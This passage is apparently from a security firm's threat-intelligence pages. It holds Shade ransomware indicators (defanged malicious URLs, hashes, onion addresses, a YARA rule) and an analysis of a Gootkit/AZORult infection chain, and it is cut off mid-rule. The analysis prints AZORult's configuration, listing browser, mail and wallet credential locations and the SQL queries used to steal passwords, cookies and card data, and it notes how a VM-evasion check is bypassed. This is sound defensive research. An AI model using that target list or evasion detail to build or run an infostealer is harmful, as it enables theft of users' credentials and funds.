hxxp://aceponline[.]org[.]ng/wp-content/themes/twentyseventeen/template-parts/footer/messg[.]jpg
hxxp://tewsusa[.]co/wp-content/themes/Divi/et-pagebuilder/messg[.]jpg
hxxp://nagoyan.fun/wp-content/themes/jin/_notes/messg[.]jpg
hxxp://kiathongind[.]com.my/wp-content/themes/WCM010013/js/megnor/admin/jscolor/messg[.]jpg
hxxp://www.ri-photo[.]com/wp-content/themes/asteria-lite/css/messg[.]jpg
hxxp://atjtourjogja[.]com/wp-includes/ID3/messg[.]jpg
hxxp://firstdobrasil[.]com.br/templates/rhuk_milkyway/html/messg[.]jpg
hxxp://weblogos[.]org/wp-content/ai1wm-backups/messg[.]jpg
hxxp://helpingpawsrescueinc[.]org/wp-content/gallery/rwerwefrew/thumbs/messg[.]jpg
hxxp://insight-analytica-amir.000webhostapp[.]com/wp-content/themes/shapely/layouts/messg[.]jpg
hxxps://orangeconsultingin.000webhostapp[.]com/wp-content/themes/zerif-lite/images/messg[.]jpg
hxxp://zmastaa[.]com/wp-content/themes/hueman/page-templates/messg[.]jpg
hxxp://thegiddystitcher[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxps://www.anneliesje[.]nl/spul/messg[.]jpg
hxxp://www.zmastaa[.]com/wp-content/themes/hueman/page-templates/messg[.]jpg
hxxp://www.theboltchick[.]com/wp-content/themes/online-marketer/bonus/messg[.]jpg
hxxps://www.lakematheson[.]com/wp-content/themes/lakematheson/fonts/specimen_files/messg[.]jpg
hxxp://maxwatermit2[.]com/templates/phoca_t/fonts/messg[.]jpg
hxxp://hobbysalon-tf[.]com/img_content/_notes/messg[.]jpg
hxxp://codebyshellbot[.]com/ravelry/hp-australia/messg[.]jpg
hxxp://365poker.000webhostapp[.]com/wp-content/themes/shapely/woocommerce/messg[.]jpg
hxxps://aafiyaat[.]com/wp-content/themes/oceanwp/templates/messg[.]jpg
hxxp://www.qlknowledge[.]com/messg[.]jpg
hxxp://staroil[.]info/app/staroil/messg[.]jpg
hxxp://www.lightbox[.]de/wp-content/themes/Extra/scripts/ext/messg[.]jpg
hxxp://withyou2408[.]com/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://bishokukoubou[.]com/test/images/_notes/messg[.]jpg
hxxp://myspaceplanner[.]fr/wp-content/themes/msp/js/messg[.]jpg
hxxp://u-kagawa[.]info/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://xindetrading.000webhostapp[.]com/wp-content/themes/shapely/template-parts/layouts/messg[.]jpg
hxxp://www.lawaaike[.]nl/wordpress/wp-admin/css/colors/blue/messg[.]jpg
hxxp://kensei-kogyo[.]com/wpmain/wp-admin/css/colors/blue/messg[.]jpg
hxxp://bit-com[.]info/bana/_notes/messg[.]jpg
hxxp://rupinasu410[.]com/messg[.]jpg
hxxps://autolikely[.]com/wp-content/themes/Divi/lang/messg[.]jpg
hxxp://www.dixo.se/templates/siteground-j15-34/images/messg[.]jpg
hxxp://orhangencebay.gen.tr/templates/rhuk_milkyway/css/messg[.]jpg
hxxp://caraccessonriesr9[.]com/aewiklm/messg[.]jpg
hxxp://nienkevanhijum[.]nl/wp-content/themes/elastico/includes/postformats/single/messg[.]jpg
hxxps://berkje[.]com/wp-content/themes/berkje/slider/messg[.]jpg
hxxps://www.evansindustries[.]com/wp-content/themes/Sterling/css/messg[.]jpg
hxxps://leeth[.]org/wp-content/themes/satu/assets/css/messg[.]jpg
hxxp://thu-san-world-challenges[.]org/wp-admin/css/colors/blue/messg[.]jpg
hxxps://fayanscimustafa[.]com/wp-content/themes/bridge/plugins/messg[.]jpg
hxxps://aialogisticsltd[.]com/wp-content/themes/erzen/css/messg[.]jpg
hxxp://webonlineshop[.]ml/image/messg[.]jpg
hxxp://lg4square[.]com/wp-content/themes/churchope/css/messg[.]jpg
hxxp://bar-tenderly[.]com/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://ia-planet[.]com/wp-content/themes/Divi/core/admin/css/messg[.]jpg
hxxp://xindetrading.000webhostapp[.]com/wp-content/themes/shapely/woocommerce/messg[.]jpg
hxxp://rosetki.sibcat[.]info/images/banners/messg[.]jpg
hxxp://montolla.tk/templates/bymontolla/js/messg[.]jpg
hxxps://videodiburama[.]com/wp-content/themes/elegantica/copias/messg[.]jpg
hxxp://caferaclete.pt/wp-admin/css/colors/blue/messg[.]jpg
hxxp://raymieszoo[.]com/wp-includes/ID3/messg[.]jpg
hxxp://www.pickledbrain[.]com/wp-content/themes/twentyten/images/headers/messg[.]jpg
hxxp://29061.dcpserver[.]de/cgi-bin/messg[.]jpg
hxxp://changematterscounselling[.]com/templates/changematterscounsellingv2/images/system/messg[.]jpg
hxxp://eviescoolstuff[.]com/wp-includes/ID3/messg[.]jpg
hxxp://www.jillharness[.]com/.logs/messg[.]jpg
hxxp://ankarabeads[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://lokersmkbwi[.]com/wp-content/themes/appointment/css/font-awesome/css/messg[.]jpg
hxxp://ingridandryan[.]com/export/screens/messg[.]jpg
hxxp://sunrise-sprit-enkazu[.]com/wp/wp-admin/css/colors/blue/messg[.]jpg
hxxp://planetpainter[.]ca/images/messg[.]jpg
hxxp://clareplueckhahn[.]com.au/backup/messg[.]jpg
hxxp://www.ventecservice.no/wp-content/themes/Divi/core/admin/css/messg[.]jpg
hxxps://kwebfun[.]com/wp-content/themes/tm-finance/languages/messg[.]jpg
hxxp://alongthelines[.]com/includes/messg[.]jpg
hxxps://www.insperide[.]nl/wp-admin/css/colors/blue/messg[.]jpg
hxxp://www.sale-petit-bonhomme[.]com/wp-content/themes/twentythirteen/languages/messg[.]jpg
hxxp://www[.]careersatltd[.]com/wp-content/themes/careersat/library/css/messg[.]jpg
hxxp://creativeapparel[.]co.uk/templates/themza_j15_69/js/messg[.]jpg
hxxp://rheniumsolutions[.]co.ke/wp-content/themes/oceanwp/inc/customizer/assets/css/messg[.]jpg
hxxp://morsengthaithai[.]com/cache/_virtuemart/messg[.]jpg
hxxp://djisyam38[.]com/wp-content/themes/total/css/fonts/messg[.]jpg
hxxp://irapak[.]com/wp-content/themes/twentyseventeen/inc/messg[.]jpg
hxxps://musojoe[.]com/wp-content/themes/Divi/css/tinymce-skin/fonts/messg[.]jpg
hxxp://kvintek[.]com/messg[.]jpg
hxxps://taking-technician.000webhostapp[.]com/wp-content/themes/shapely/languages/messg[.]jpg
hxxp://cozynetworks[.]com/templates/innovativelab/src/messg[.]jpg
hxxp://danieljenkins2000.000webhostapp[.]com/wp-content/themes/shapely/layouts/messg[.]jpg
hxxp://super-industries[.]co/wp-includes/ID3/messg[.]jpg
hxxp://supersnacks.rocks/OLD/wp-admin/css/colors/blue/messg[.]jpg
hxxp://jupajubbeauty[.]com/administrator/cache/messg[.]jpg
hxxp://bookle.se/cgi-bin/messg[.]jpg
hxxp://wallpapershd[.]xyz/messg[.]jpg
hxxps://www.shatki[.]info/templates/ld_benew/images/blue/messg[.]jpg
hxxp://rbgrouptech.000webhostapp[.]com/wp-content/themes/shapely/woocommerce/messg[.]jpg
hxxps://psychoactive-mentio.000webhostapp[.]com/wp-content/themes/envo-business/lib/customizer/css/messg[.]jpg
hxxp://mail.optiua[.]com/messg[.]jpg
hxxp://stringletter[.]com/wp-content/themes/oneengine/fonts/messg[.]jpg
hxxp://paewaterfilter[.]com/administrator/cache/messg[.]jpg
hxxp://skincareshopbeauty[.]com/administrator/cache/messg[.]jpg
hxxps://otterloo[.]nl/wp-content/themes/twentyten/images/headers/messg[.]jpg
hxxp://bojacobsen[.]dk/blogs/media/messg[.]jpg
hxxp://maxdvr.000webhostapp[.]com/wp-content/themes/twentyseventeen/inc/messg[.]jpg
hxxp://bundartree.000webhostapp[.]com/wp-content/themes/twentyseventeen/template-parts/footer/messg[.]jpg
hxxps://refurbished.my/vqmodx/install/messg[.]jpg
hxxp://www.basicpartner.no/wp-admin/css/colors/blue/messg[.]jpg
hxxps://wamambotrading[.]com/wp-content/themes/revo/fonts/messg[.]jpg
hxxps://demosthene[.]org/wp-content/themes/Avada/assets/admin/css/messg[.]jpg
hxxp://instaforexmas[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://clarte-thailand[.]com/administrator/cache/messg[.]jpg
hxxp://www.byce[.]nl/wp-content/backups/messg[.]jpg
hxxp://tanecni[.]org/templates/jt005_j25/css/messg[.]jpg
hxxps://spleenjanitors[.]com[.]ng/wp-content/themes/astra/assets/css/minified/compatibility/woocommerce/messg[.]jpg
hxxps://azraglobalnetwork[.]com.my/admin/controller/catalog/messg[.]jpg
hxxp://landing-page1169.000webhostapp[.]com/wp-content/themes/shapely/languages/messg[.]jpg
hxxp://hi-shop[.]ml/sxdcfvgybhunjm/admin/controller/catalog/messg[.]jpg
hxxp://blessedstudiodigital.000webhostapp[.]com/wp-content/themes/shapely/layouts/messg[.]jpg
hxxps://www.pakmedcon[.]com/wp-content/themes/twentyseventeen/assets/css/messg[.]jpg
hxxp://nienkevanhijum[.]nl/wp-content/themes/elastico/js/messg[.]jpg
hxxp://muratto.site/.well-known/pki-validation/messg[.]jpg
hxxps://www.fibeex[.]com/wp-content/themes/businext/components/headers/messg[.]jpg
hxxps://alexis.monville[.]com/htdocs/wp-admin/css/colors/blue/messg[.]jpg
hxxp://indigo-daisy.000webhostapp[.]com/wp-content/themes/twentyseventeen/template-parts/footer/messg[.]jpg
hxxp://stringletter[.]com/wp-content/themes/oneengine/plugins/admin-core/assets/css/vendor/elusive-icons/font/messg[.]jpg
hxxp://latinbeat[.]com/wp-content/themes/streamline_30/images/psds/messg[.]jpg
hxxp://nn-webdesign[.]be/templates/rt_terrantribune_j15/js/messg[.]jpg
hxxp://250land.000webhostapp[.]com/wp-content/themes/shapely/template-parts/layouts/messg[.]jpg
hxxp://mock.fpdev[.]xyz/ee/assets/css/messg[.]jpg
hxxp://tekanova[.]com/templates/templategeo_26/css/messg[.]jpg
hxxp://speak-and-translate[.]com/errordocs/style/messg[.]jpg
hxxps://digituote.fi/wp-content/themes/masonic/css/admin/messg[.]jpg
hxxp://market.optiua[.]com/catalog/controller/account/messg[.]jpg
hxxps://peinture-marseille[.]com/wp-includes/IXR/messg[.]jpg
hxxp://stradious[.]com/wp-includes/ID3/messg[.]jpg
hxxp://hi-shop[.]ml/sxdcfvgybhunjm5/admin/controller/catalog/messg[.]jpg
hxxp://d-fannet[.]com/doc_image/messg[.]jpg
hxxp://duttonandsherman[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://kerusiinovasi[.]com/wp-includes/ID3/messg[.]jpg
hxxps://iphonedelivery[.]com/system/config/messg[.]jpg
hxxp://bienhieutrongnha[.]com/forum/cache/messg[.]jpg
hxxps://alfaqihuddin[.]com/forum/cache/messg[.]jpg
hxxps://madrascrackers[.]com/wp-content/themes/tyche/woocommerce/global/messg[.]jpg
hxxp://posadaelnogal.000webhostapp[.]com/wp-content/themes/shapely/template-parts/layouts/messg[.]jpg
hxxp://www.qlcalendar[.]com/messg[.]jpg
hxxp://good-deal[.]ml/image/cache/catalog/404/messg[.]jpg
hxxp://tree.sibcat[.]info/images/full/messg[.]jpg
hxxp://joinjohndoeit.000webhostapp[.]com/wp-content/themes/shapely/inc/custom-controls/messg[.]jpg
hxxp://tontonfilms[.]com/wp-content/themes/garnish/admin/css/messg[.]jpg
hxxps://motelfortpierce[.]com/wp-content/themes/Divi/et-pagebuilder/messg[.]jpg
hxxps://the-bombay-summit.000webhostapp[.]com/wp-content/themes/llorix-one-lite/css/messg[.]jpg
hxxp://robjunior[.]com/wp-content/themes/rob/projects/messg[.]jpg
hxxp://sacredheartwinnetka[.]com/wp-content/themes/Aggregate/sampledata/sample_images/messg[.]jpg
hxxp://dev[.]europeanexperts[.]com/wp-content/cache/minify/messg[.]jpg
hxxp://dev01[.]europeanexperts[.]com/.well-known/pki-validation/messg[.]jpg
hxxp://hanuram[.]net/messg[.]jpg
hxxp://dawgpoundinc[.]com/templates/yoo_level/html/com_contact/category/messg[.]jpg
hxxps://myboysand.me/wp-content/ai1wm-backups/messg[.]jpg
hxxp://www.scotts-grotto[.]org/packages/asmiller_gallery/blocks/asmiller_gallery/templates/default/messg[.]jpg
hxxps://kasutwakai[.]com/admin/controller/catalog/messg[.]jpg
hxxps://the-bombay-summit.000webhostapp[.]com/wp-content/themes/llorix-one-lite/fonts/messg[.]jpg
hxxp://stonescrossing[.]com/wp-content/themes/stones-crossing/assets/css/messg[.]jpg
hxxps://kokoon[.]co.uk/wp-content/themes/kokoon/css/fonts/bebasneue/messg[.]jpg
hxxp://hugomaia[.]com/templates/agitato/images/messg[.]jpg
hxxp://3dpers[.]com/messg[.]jpg
hxxp://fupu[.]org/converter/messg[.]jpg
hxxp://mentoringjagojualan[.]com/site/cache/messg[.]jpg
hxxps://srikrungdd[.]com/wp-content/themes/buuEasyShop/languages/messg[.]jpg
hxxps://kobac-yokohama01[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxps://ericotv[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxps://kobac-suzuka[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://citylawab[.]com/wp-content/themes/envo-business/lib/customizer/css/messg[.]jpg
hxxps://anket.kalthefest[.]org/messg[.]jpg
hxxps://chancesaffiliates[.]com/wp-content/themes/Impreza/config/messg[.]jpg
hxxps://smile-kobac[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://ecchionline[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://ikuhentai[.]net/cgi-bin/messg[.]jpg
hxxp://vps200999.vps.ovh[.]ca/messg[.]jpg
hxxps://bits-kenya[.]com/wp-content/themes/twentyseventeen/template-parts/footer/messg[.]jpg
hxxps://kobac-hita[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://bakita.life/wp-admin/css/colors/blue/messg[.]jpg
hxxps://enjoy-kobac[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxps://drjoshihospital[.]com/wp-content/themes/i-excel/inc/css/messg[.]jpg
hxxp://morganbits[.]com/.well-known/acme-challenge/messg[.]jpg
hxxp://muapromotion[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://rarejewelry[.]net/.well-known/acme-challenge/messg[.]jpg
hxxp://blockchainhowtouse[.]com/wp-content/themes/ashe/languages/messg[.]jpg
hxxp://kobac-namerikawa01[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://yurayura.life/wp-admin/css/colors/blue/messg[.]jpg
hxxp://acm.ee/wp-content/themes/acm/fonts/Nexa_Bold/fonts/messg[.]jpg
hxxp://rocksolidstickers[.]com/wp-includes/ID3/messg[.]jpg
hxxp://kobac-takayama[.]com/wp-admin/css/colors/blue/messg[.]jpg
hxxp://manoulaland[.]com/wp-content/themes/sydney/plugins/messg[.]jpg
hxxp://ghetto-royale[.]com/wp-content/themes/astra/languages/messg[.]jpg


Hashes
11/02
231cd1b166a79d458de0a200fd8f5acdc36e612df4c76f3945570f767154f968 (.zip)
e0c588622525e816be4f308d8543eac50e5aeed1562a9cd0e6d97c7d8af4a5b1 (.js)
d7b9facf6a9d331a8a15b27d10148da869b094807dd6550aa87f7e45dc88b9f9 (.exe)

13/02
32007b1893001dc8cd8e2da7450334bb3b25d4abfa935f4bcf3246236f396d11 (.zip)
8bebd1b8d74da26dfd38d0a23545d555a5cc1e1d5af23efbc768ce9d28dae4f4 (.js)
bf32e333d663fe20ab1c77d2f3f3af946fb159c51b1cd3b4b2afd6fc3e1897bb (.exe)

14/02
1c06b518a94ad6db106d7d31626f2a7c80bd03f0dcd6d0bc450ffac1750cdf79 (.exe)

15/02
da1ee26f049d12590348e854be6cd9fab099a0742956ba1a44f639f24a2bee72 (.exe)

OTHER 
404ae50b0e1bce4b8421cc654b54591fcc84edd600c76e1a2dda1e0653a6cfe9
c9d9a1cfd64026e12cd211228bcb1476e5da60cfcf1af9498e9c058efa7b7e0e
97f002b5bad5077e8a8e08acf73c4815d4cbaac17979e5595f5785aeede8508a
b836f6973a97e0ad8bd02e32f63bab39f6cbed38db932dbd4a12937f7194fbb4
a8c452946e291216b7bba41b8e7f9a3eb5ee9178c9559e4b5017ed832d90b94f
ca233059d5f7370dfdadf37d8f6b27ebf72ddaf6458613c2084b705727cf68ab
fa54c4e34732b611921820be56dd690a4de98285828e4be487b904679a855a92
b5b5819045a5a0a18208e3f5fac3b7b7e0733fb958001c1dfb3413e2a9b86650
ecbe8ab4a1d08eac6a0cab99ace3e0eb6a37a9834e2996c208cdf91b351ff022
c9de2c3c7f3b14de2877154ad63fb2a10fdad23ed1e56b02d1960dda0f8d9ac3
dfaa49c45c94ed1e0f333bf36aba29b525ceaa7ccb8be1928a16c579e2de4706
2d2d96c90922dd755b9302dac058083a26c5ea7ff83e4cc60e4632ec7ff6d509
6072ef4d17f6bdc3bc0a659bcdac8a17dcd857e973babffc67f5af417d539919



Email
pilotpilot088 @ gmail.com

URL
hxxp:// cryptsen7fo43rr6[.onion/
hxxp:// cryptsen7fo43rr6[.onion.to/
hxxp:// cryptsen7fo43rr6[.onion.cab/

Yara Rule

import "pe"
rule Shade_Ransomware_18_02_2019{

	meta:
  	description = "Yara Rule for Shade_Ransomware"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_18"
  	tlp = "white"
  	category = "informational"

	strings:
    	$a = "DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDD"
    	$b = {55 8B EC 81 EC E0 04 00 00 C7 45 F0 02 00 00 00 C6 85 B6 FE}
   	$c = {58 00 00 0F 85 2C FF FF FF EB 00 6A 03 6A}
   	$d = {58 00 ?C 5? 58 00 ?0 5? 58 00 ?4 5? 58 00 ?8}

	condition:
    	pe.number_of_sections == 3 and pe.machine == pe.MACHINE_I386 and all of them
}

This blog post was authored by Antonio Farina, Davide Testa and Luca Mella of Cybaze-Yoroi Z-LAB


Gootkit: Unveiling the Hidden Link with AZORult

Introduction

In the last days a huge attack campaign hit several organizations across the Italian cyberspace, as stated on bulletin N020219 the attack waves tried to impersonate legit communication from a known Express Courier. However, a deeper analysis by Cybaze-Yoroi ZLAB revealed interesting hidden aspects, spotting a connection between the AZORult toolkit and a particular Gootkit payload.

Technical analysis

Stage 1 - The Attached Javascript

Most of the infection attempts started with a particular email attachment: a compressed archive containing stealthy JavaScript code, most of the times able to avoid antivirus detection during the initial stages of the attack campaigns.

Hash12791e14ba82d36d434e7c7c0b81c7975ce802a430724f134b7e0cce5a7bb185
Threatmalicious js
DescObfuscated malicious JS. This download first component and keep communication with C2 server.

Table 1:  Generic information about malicious js file

This JS file is an obfuscated dropper with the purpose to download another component from a “safe” remote location:

Figure 1: Snippet from the JavaScript attachment

It contacts two distinct servers, googodsgld.]com and driverconnectsearch.]info. The behaviour of this sort of JavaScript stager is as essential as interesting: it downloads other executable code able to virtually do anything the attacker wants. This kind of pattern and the simplicity of the code itself remotely resemble the Brushaloader threat, a known dropper/stager written in VBScript and contacting its remote infrastructures in a similar manner. We can hypothesize that the malware writers may have emulated the Brushaloader stager functionalities, creating a sort of custom version exploiting the same mechanism.

Figure 2: Classic Brushaloader sample (left) along with the recent Javascript stager (right)
Figure 3: Encrypted communication with driverconnectsearch[.]info server

After the first contact attempt to googodsgld[.]com, the script communicates with the other destination and retrieves a Cabinet Archive encoded within the chunk of executable javascript code returned by driverconnectsearch[.]info. Then it stores it in “%APPDATA%\Local\Temp\”.  

As shown in Figure 3,  the first characters of the encoded payload string are “TVNDRg” which translates to “MSCF”: standard header of the Microsoft Cabinet compressed file format.

Figure 4: Javascript downloaded from diverconnectsearch[.]info server.

Stage 2 - The Cabinet

Actually, this .CAB archive is just a shell for a PE32 executable file:

Hash2274174ed24425f41362aa207168b491e6fb55cab208116070f91c049946097a
ThreatRuntimeBroker5.exe
DescFirst component downloaded by malicious js file.

Table 2:  Generic information about RuntimeBroker5.exe (AZORult)

Executing the RuntimeBroker5.exe sample, seems it behaves as another dropper: it downloads two other components from the remote server “hairpd[.]com”.

Figure 5: RuntimeBroker5.exe process execution

The sample file actually does not perform only this downlaod. Here one of the key point of the article: it also establishes a communication channel with the AZORult C2 host “ssl.]admin.]itybuy.]it”.

The network packet exchanged with the server confirms this identification due to the known communication patterns and the dynamic analysis also shows info-stealing behaviours compatible with the identified threat.

As shown in the following figure, the written files in “%APPDATA%\Local\Temp\” path closely match AZORult analysis described by Unit42 research group.

Figure 6: Evidence of the similarity of RuntimeBroker5.exe and AZORult malware variant analyzed by UNIT42
Figure 7: C2 Communication comparison

During the dynamic analysis, the RuntimeBroker5.exe sample received a sort of configuration file from the C2 server. We extracted it from the running malware image and decoded it:

firefox.exe
SOFTWARE\Wow6432Node\Mozilla\Mozilla Firefox\
SOFTWARE\Mozilla\Mozilla Firefox
SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command
SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\firefox.exe
%appdata%\Mozilla\Firefox\Profiles\
MozillaFireFox
CurrentVersion
Install_Directory
nss3.dll
thunderbird.exe
SOFTWARE\Wow6432Node\Mozilla\Mozilla Thunderbird\
SOFTWARE\Mozilla\Mozilla Thunderbird
SOFTWARE\Classes\ThunderbirdEML\DefaultIcon
%appdata%\Thunderbird\Profiles\
ThunderBird
SELECT host, path, isSecure, expiry, name, value FROM moz_cookies
SELECT fieldname, value FROM moz_formhistory
NSS_Init
PK11_GetInternalKeySlot
PK11_Authenticate
PK11SDR_Decrypt
NSS_Shutdown
PK11_FreeSlot
logins.json
logins
hostname
timesUsed
encryptedUsername
encryptedPassword
cookies.sqlite
formhistory.sqlite
%LOCALAPPDATA%\Google\Chrome\User Data\
%LOCALAPPDATA%\Google\Chrome SxS\User Data\
%LOCALAPPDATA%\Xpom\User Data\
%LOCALAPPDATA%\Yandex\YandexBrowser\User Data\
%LOCALAPPDATA%\Comodo\Dragon\User Data\
%LOCALAPPDATA%\Amigo\User Data\
%LOCALAPPDATA%\Orbitum\User Data\
%LOCALAPPDATA%\Bromium\User Data\
%LOCALAPPDATA%\Chromium\User Data\
%LOCALAPPDATA%\Nichrome\User Data\
%LOCALAPPDATA%\RockMelt\User Data\
%LOCALAPPDATA%\360Browser\Browser\User Data\
%LOCALAPPDATA%\Vivaldi\User Data\
%APPDATA%\Opera Software\
%LOCALAPPDATA%\Go!\User Data\
%LOCALAPPDATA%\Sputnik\Sputnik\User Data\
%LOCALAPPDATA%\Kometa\User Data\
%LOCALAPPDATA%\uCozMedia\Uran\User Data\
%LOCALAPPDATA%\QIP Surf\User Data\
%LOCALAPPDATA%\Epic Privacy Browser\User Data\
%APPDATA%\brave\
%LOCALAPPDATA%\CocCoc\Browser\User Data\
%LOCALAPPDATA%\CentBrowser\User Data\
%LOCALAPPDATA%\7Star\7Star\User Data\
%LOCALAPPDATA%\Elements Browser\User Data\
%LOCALAPPDATA%\TorBro\Profile\
%LOCALAPPDATA%\Suhba\User Data\
%LOCALAPPDATA%\Safer Technologies\Secure Browser\User Data\
%LOCALAPPDATA%\Rafotech\Mustang\User Data\
%LOCALAPPDATA%\Superbird\User Data\
%LOCALAPPDATA%\Chedot\User Data\
%LOCALAPPDATA%\Torch\User Data\
GoogleChrome
GoogleChrome64
InternetMailRu
YandexBrowser
ComodoDragon
Amigo
Orbitum
Bromium
Chromium
Nichrome
RockMelt
360Browser
Vivaldi
Opera
GoBrowser
Sputnik
Kometa
Uran
QIPSurf
Epic
Brave
CocCoc
CentBrowser
7Star
ElementsBrowser
TorBro
Suhba
SaferBrowser
Mustang
Superbird
Chedot
Torch
Login Data
Web Data
SELECT origin_url, username_value, password_value FROM logins
SELECT host_key, name, encrypted_value, value, path, secure, (expires_utc/1000000)-11644473600 FROM cookies
SELECT host_key, name, name, value, path, secure, expires_utc FROM cookies
SELECT name, value FROM autofill
SELECT name_on_card, expiration_month, expiration_year, card_number_encrypted value FROM credit_cards
%APPDATA%\Microsoft\Windows\Cookies\
%APPDATA%\Microsoft\Windows\Cookies\Low\
%LOCALAPPDATA%\Microsoft\Windows\INetCache\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\INetCookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!001\MicrosoftEdge\Cookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\#!002\MicrosoftEdge\Cookies\
%LOCALAPPDATA%\Packages\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\AC\MicrosoftEdge\Cookies\
InternetExplorer
InternetExplorerLow
InternetExplorerINetCache
MicrosoftEdge_AC_INetCookies
MicrosoftEdge_AC_001
MicrosoftEdge_AC_002
MicrosoftEdge_AC
Software\Microsoft\Internet Explorer
Software\Microsoft\Internet Explorer\IntelliForms\Storage2
Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook
Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook
POP3
IMAP
SMTP
HTTP
%appdata%\Waterfox\Profiles\
Waterfox
%appdata%\Comodo\IceDragon\Profiles\
IceDragon
%appdata%\8pecxstudios\Cyberfox\Profiles\
Cyberfox
sqlite3_open
sqlite3_close
sqlite3_prepare_v2
sqlite3_step
sqlite3_column_text
sqlite3_column_bytes
sqlite3_finalize
%APPDATA%\filezilla\recentservers.xml
<RecentServers>
</RecentServers>
<Server>
</Server>
<Host>
</Host>
<Port>
</Port>
<User>
</User>
<Pass>
</Pass>
<Pass encoding="base64">
FileZilla
ole32.dll
CLSIDFromString
{4BF4C442-9B8A-41A0-B380-DD4A704DDB28}
{3CCD5499-87A8-4B10-A215-608888DD3B55}
vaultcli.dll
VaultOpenVault
VaultEnumerateItems
VaultGetItem
MicrosoftEdge
Browsers\AutoComplete
CookieList.txt
SELECT host_key, name, encrypted_value, value, path, is_secure, (expires_utc/1000000)-11644473600 FROM cookies
%appdata%\Moonchild Productions\Pale Moon\Profiles\
PaleMoon
%appdata%\Electrum\wallets\
\Electrum
%appdata%\Electrum-LTC\wallets\
\Electrum-LTC
%appdata%\ElectrumG\wallets\
\ElectrumG
%appdata%\Electrum-btcp\wallets\
\Electrum-btcp
%APPDATA%\Ethereum\keystore\
\Ethereum
%APPDATA%\Exodus\
\Exodus
\Exodus Eden
*.json,*.seco
%APPDATA%\Jaxx\Local Storage\
\Jaxx\Local Storage\
%APPDATA%\MultiBitHD\
\MultiBitHD
mbhd.wallet.aes,mbhd.checkpoints,mbhd.spvchain,mbhd.yaml
.wallet
wallets\.wallet
wallet.dat
wallets\wallet.dat
electrum.dat
wallets\electrum.dat
Software\monero-project\monero-core
wallet_path
Bitcoin\Bitcoin-Qt
BitcoinGold\BitcoinGold-Qt
BitCore\BitCore-Qt
Litecoin\Litecoin-Qt
BitcoinABC\BitcoinABC-Qt
%APPDATA%\Exodus Eden\
%Appdata%\Psi+\profiles\
%Appdata%\Psi\profiles\
<roster-cache>
</roster-cache>
<jid type="QString">
<password type="QString">
</password>

Table 3: AZORult Configuration file

The multiple references to Browser Cookies and CryptoWallets confirms the “RuntimeBroker5.exe” sample, initially hidden into the cabilet archive,  is an AZORult variant.

Stage 3 - The Payload

The other file download from hairpd[.]com by AZORult’s sample is another executable PE32.

Figure 8: GET request to download the payload.
Hasha75b318eb2ae6678fd15f252d6b33919203262eb59e08ac32928f8bad54ca612
Threatsputik.exe
Descrizione BreveSecond component downloaded by malware. This component is alive after the infection.

Table 4:  Generic information about sputik.exe (Gootkit)

The “sputik.exe” uses a set of evasion techniques to avoid the monitoring of the process, such as invoking the “UuidCreateSequential” API to detect the usage of typical virtual machine’s MAC addresses, but this technique can be easily bypassed by spoofing a real network card one.

Figure 9: Evasion technique through the check “UuidCreateSequential” API call

Bypassing all the evasion techniques reveals the nature of the payload: a Gootkit malware implant.

Figure 10: Command line of the final sample

By instrumenting the execution of the implant, we were able to extract part of the JavaScript code of the malware. The Gootkit implant counts several modules written on top of NodeJS technology embedded into the PE file, revealing part of the implant code.

Figure 11: Portion of Gootkit code snippet

In the past years, Gootkit source code have been leaked online and part of it is also available on the Github platform. This way we were able to investigate differences between the extracted snippets and the known, previously leaked, malware version.

Figure 12: Comparison between extracted Gootkit version and the leaked one

As general consideration, we noticed a lot of similarities between the codes, they are perfectly compatible, but few differences holds. For instance private keys and certificates have been modified, showing the malware author choose a stronger key.

Table 5:  Certificate comparison
(New on the left, known/leaked on the right)

Conclusion

These attack waves targeting italian organization and users revealed interesting connections between two threats we was used to monitor and detect across both the InfoSec community and the CERT-Yoroi’s constituency, revealing a hidden link connecting this particular AZORult instance and with the Gootkit implant.

Also, the analysis pointed to an evolution of the dropping techniques used in the initial stages of the attacks by cyber-criminals, showing how the usage of extremely flexible stagers written in high level languages, JavaScript in this case, is becoming more popular and needs to be carefully monitored.

Indicator of Compromises

Yara rules

rule Gootkit_11_02_2019{

	meta:
  	description = "Yara Rule for Gootkit"
  	author = "Cybaze Zlab_Yoroi"
  	last_updated = "2019_02_11"
  	tlp = "white"
  	category = "informational"

	strings:
    		 $a = {4D 5A}
   		 $b1 = {2D EE 9D 00 04 29 76 EC 00 00 F9}
   		 $c1 = {E6 C5 1F 2A 04 5A C8}
   		 $d1 = "LoadCursorW"
    		 $b2 = {75 0E E8 84 8D FF FF 83 CF FF C7}
    		 $c2 = {B9 C7 25 E7 00 5A 00 00 BA}
    		 $d2 = "GetCurrentPosition"

	condition:
    		 $a and (($b1 and $c1 and $d1) or ($b2 and $c2 and $d2))
}

rule Azorult_11_02_2019{

	meta:
  	description = "Yara Rule for Azorult"
  	author = "Cybaze Zlab_Yoroi"
